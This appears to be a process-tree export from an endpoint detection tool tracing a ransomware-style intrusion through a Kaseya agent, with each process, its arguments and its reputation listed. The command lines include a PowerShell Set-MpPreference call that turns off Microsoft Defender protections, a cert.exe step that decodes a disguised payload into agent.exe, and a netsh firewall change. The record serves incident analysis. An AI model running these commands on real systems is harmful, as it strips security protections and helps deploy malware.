TREE VIEW (24 processes)
XXXXX: 0d09ee78-22c5-4ed8-877f-b40a28a4c344
0 executes undefined undefined 0 executes agentmon.exe 3492undefined undefined executes undefined undefinedundefined undefined executes undefined undefinedundefined undefined executes undefined undefinedundefined undefined executes undefined undefinedundefined undefined executes undefined undefinedagentmon.exe 3492 executes logman.exe 4904agentmon.exe 3492 executes lua.exe 6928agentmon.exe 3492 executes lua.exe 6888agentmon.exe 3492 executes kaseya.agentendpoint.exe 6760agentmon.exe 3492 executes cmd.exe 14460kaseya.agentendpoint.exe 6760 executes conhost.exe 1316logman.exe 4904 executes conhost.exe 4892lua.exe 6928 executes conhost.exe 6408lua.exe 6928 executes lua.exe 9592lua.exe 6928 executes lua.exe 14832lua.exe 6928 executes lua.exe 7488lua.exe 9592 executes conhost.exe 1440lua.exe 14832 executes conhost.exe 8536lua.exe 7488 executes conhost.exe 4852lua.exe 6888 executes conhost.exe 7064cmd.exe 14460 executes conhost.exe 2016cmd.exe 14460 executes ping.exe 14220cmd.exe 14460 executes powershell.exe 1232cmd.exe 14460 executes cert.exe 3500cmd.exe 14460 executes agent.exe 8964agent.exe 8964 executes msmpeng.exe 14588msmpeng.exe 14588 executes netsh.exe 11812netsh.exe 11812 executes conhost.exe 60127/2/2021, 3:16:04 PMBootPath: c:\program files (x86)\kaseya\vfmpc589317146091449\agentmon.exe Signed By: Kaseya Corporation Reputation: Benignagentmon.exe 3492Attack Start, Vertical Privilege EscalationUncommonly Used Port, System PrivilegeThird-party Software...Path: c:\program files (x86)\kaseya\vfmpc589317146091449\kaseya.agentendpoint.exe Arguments: XXXXX Signed By: Kaseya Development, LLC Reputation: Benignkaseya.agentendpoint.exe 6760Uncommonly Used Port, System PrivilegeExecution through API, Third-party SoftwarePath: c:\windows\system32\conhost.exe Arguments: 0xffffffff -ForceV1 Signed By: Microsoft Windows Reputation: Benignconhost.exe 1316System Privilege, Execution through APIPath: c:\windows\syswow64\logman.exe Signed By: Microsoft Windows Reputation: Benignlogman.exe 4904System Privilege, Execution through APIPath: c:\windows\system32\conhost.exe Arguments: 0xffffffff -ForceV1 Signed By: Microsoft Windows Reputation: Benignconhost.exe 4892System Privilege, Execution through APIPath: c:\program files (x86)\kaseya\vfmpc589317146091449\extensions\lua.exe Arguments: XXXXX Signed By: Kaseya Development, LLC Reputation: Benignlua.exe 6928System Privilege, Execution through APIThird-party SoftwarePath: c:\windows\system32\conhost.exe Arguments: 0xffffffff -ForceV1 Signed By: Microsoft Windows Reputation: Benignconhost.exe 6408System Privilege, Execution through APIPath: c:\program files (x86)\kaseya\vfmpc589317146091449\extensions\lua.exe Arguments: XXXXX Signed By: Kaseya Development, LLC Reputation: Benignlua.exe 9592System Privilege, Execution through APIThird-party SoftwarePath: c:\windows\system32\conhost.exe Arguments: 0xffffffff -ForceV1 Signed By: Microsoft Windows Reputation: Benignconhost.exe 1440System Privilege, Execution through APIPath: c:\program files (x86)\kaseya\vfmpc589317146091449\extensions\lua.exe Arguments: XXXXX Signed By: Kaseya Development, LLC Reputation: Benignlua.exe 14832System Privilege, Execution through APIThird-party SoftwarePath: c:\windows\system32\conhost.exe Arguments: 0xffffffff -ForceV1 Signed By: Microsoft Windows Reputation: Benignconhost.exe 8536System Privilege, Execution through APIPath: c:\program files (x86)\kaseya\vfmpc589317146091449\extensions\lua.exe Arguments: XXXXX Signed By: Kaseya Development, LLC Reputation: Benignlua.exe 7488System Privilege, Execution through APIThird-party SoftwarePath: c:\windows\system32\conhost.exe Arguments: 0xffffffff -ForceV1 Signed By: Microsoft Windows Reputation: Benignconhost.exe 4852System Privilege, Execution through APIPath: c:\program files (x86)\kaseya\vfmpc589317146091449\extensions\lua.exe Arguments: XXXXX Signed By: Kaseya Development, LLC Reputation: Benignlua.exe 6888System Privilege, Execution through APIThird-party SoftwarePath: c:\windows\system32\conhost.exe Arguments: 0xffffffff -ForceV1 Signed By: Microsoft Windows Reputation: Benignconhost.exe 7064System Privilege, Execution through APIPath: c:\windows\syswow64\cmd.exe Arguments: /c ping 127.0.0.1 -n 3217 > nul & C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Set-MpPreference -DisableRealtimeMonitoring $true -DisableIntrusionPreventionSystem $true -DisableIOAVProtec... Signed By: Microsoft Windows Reputation: Benigncmd.exe 14460Dropped Executable, Windows Dir LurkingAbnormal Behavior, System PrivilegeFile Deletion...Path: c:\windows\system32\conhost.exe Arguments: 0xffffffff -ForceV1 Signed By: Microsoft Windows Reputation: Benignconhost.exe 2016System Privilege, Execution through APIPath: c:\windows\syswow64\ping.exe Arguments: 127.0.0.1 -n 3217 Signed By: Microsoft Windows Reputation: Benignping.exe 14220System Privilege, Execution through APIPath: c:\windows\syswow64\windowspowershell\v1.0\powershell.exe Arguments: Set-MpPreference -DisableRealtimeMonitoring $true -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetwo... Signed By: Microsoft Windows Reputation: Benignpowershell.exe 1232Windows Dir Lurking, ScriptingDropped Script, System PrivilegeFile Deletion...Path: c:\windows\cert.exe Arguments: -decode c:\kworking\agent.crt c:\kworking\agent.exe Signed By: Unsigned Reputation: Unknowncert.exe 3500Dropped Executable, Modify RegistryUnsigned Process, System PrivilegeExecution through API...Path: c:\kworking\agent.exe Signed By: PB03 TRANSPORT LTD. Reputation: Malwareagent.exe 8964Trigger: mpsvc.dllDropped Executable, Windows Dir LurkingDropped Dll, System PrivilegeExecution through API...Path: c:\windows\msmpeng.exe Signed By: Microsoft Corporation Reputation: Benignmsmpeng.exe 14588System Privilege, Execution through APIPath: c:\windows\syswow64\netsh.exe Arguments: advfirewall firewall set rule group="Network Discovery" new enable=Yes Signed By: Microsoft Windows Reputation: Benignnetsh.exe 11812Modify Registry, Dangerous ExecutionDisabling Security Tools, Windows Firewall TamperingSystem Privilege...Path: c:\windows\system32\conhost.exe Arguments: 0xffffffff -ForceV1 Signed By: Microsoft Windows Reputation: Benignconhost.exe 6012System Privilege, Execution through APIS-1-5-32-544
^
Process Name:
Arguments:
Path:
PID:
Start Time:
Close Time:
Duration:
Created By:
Created By PID:
Parent Chain:
MD5:
Signed By:
User Name:
User SID:
SID Name:
Integrity:
SID Description:
Classification:
Malware Family:
First Seen:
Risk:
Severity:
Confidence:
Detections:
Submitted As:
File Type:
File Size (Bytes):
File Version:
Signed By:
Company:
System Privilege, Execution through API
Legend
Close
Arguments: